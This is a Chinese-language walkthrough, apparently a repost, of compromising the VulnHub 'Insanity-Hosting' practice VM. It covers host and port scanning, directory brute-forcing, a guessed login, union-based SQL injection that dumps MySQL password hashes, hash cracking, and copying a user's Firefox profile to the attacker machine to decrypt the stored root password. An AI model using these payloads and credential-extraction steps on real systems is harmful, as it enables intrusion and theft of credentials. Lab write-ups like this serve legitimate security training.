vulnhub之Insanity-Hosting的实践

admin 2022年9月19日00:28:05评论178 views字数 1559阅读5分11秒阅读模式

今天实践的是vulnhub的Insanity-Hosting镜像,

下载地址,https://download.vulnhub.com/insanity/Insanity-Hosting.ova,

用workstation导入,能够地址扫描到结果,

sudo netdiscover -r 192.168.58.0/24,根据经验,149是靶机,

vulnhub之Insanity-Hosting的实践

继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.149,

vulnhub之Insanity-Hosting的实践

有http服务,做一下目录爆破,sudo dirb http://192.168.58.149,

获取到几个有用的目录,

http://192.168.58.149/news,

http://192.168.58.149/webmail,

http://192.168.58.149/monitoring

浏览器访问http://192.168.58.149/news,

vulnhub之Insanity-Hosting的实践

再继续点击时发现问题,

vulnhub之Insanity-Hosting的实践

本地添加dns记录,/etc/hosts,www.insanityhosting.vm,再次访问,

vulnhub之Insanity-Hosting的实践

获取到一个信息,Otis应该是个用户名,

浏览器访问http://192.168.58.149/webmail,

vulnhub之Insanity-Hosting的实践

浏览器访问http://192.168.58.149/monitoring,

vulnhub之Insanity-Hosting的实践

用户名密码otis/123456登录,123456是猜出来的,

http://192.168.58.149/webmail,

vulnhub之Insanity-Hosting的实践

http://192.168.58.149/monitoring,

vulnhub之Insanity-Hosting的实践

在monitoring这边添加记录,

vulnhub之Insanity-Hosting的实践

就会在webmail这边收到邮件,

vulnhub之Insanity-Hosting的实践

经过实验,发现monitoring这边添加内容有sql注入漏洞,经过一系列操作,

a" UNION SELECT group_concat(schema_name),2,3,4 FROM information_schema.schemata -- -

a" UNION SELECT group_concat(table_name),2,3,4 FROM information_schema.tables where table_schema = 'mysql' -- -

a" UNION SELECT group_concat(column_name),2,3,4 FROM information_schema.columns where table_name = 'user' -- -

a" UNION SELECT group_concat(user),group_concat(password),group_concat(authentication_string),4 FROM mysql.user -- -

得到elliot账户和其密码的哈希值:5A5749F309CAC33B27BA94EE02168FA3C3E7A3E9,

vulnhub之Insanity-Hosting的实践

经过哈希解码获取到明文elliot123,

vulnhub之Insanity-Hosting的实践

可以ssh登录进靶机,发现firefox目录,

vulnhub之Insanity-Hosting的实践

把firefox目录拷贝到kali攻击机,

scp -r [email protected]:/home/elliot/.mozilla/firefox/esmhp32w.default-default/  /home/kali/firefox/,

下载firefox解密脚本,

git clone https://github.com/unode/firefox_decrypt.git,

解密,python firefox_decrypt/firefox_decrypt.py firefox/,

得到root/S8Y389KJqWpJuSwFqFZHwfZ3GnegUa,

vulnhub之Insanity-Hosting的实践

在靶机上su -切到root,id确认没问题,

vulnhub之Insanity-Hosting的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Insanity-Hosting的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月19日00:28:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Insanity-Hosting的实践https://cn-sec.com/archives/1303051.html

发表评论

匿名网友 填写信息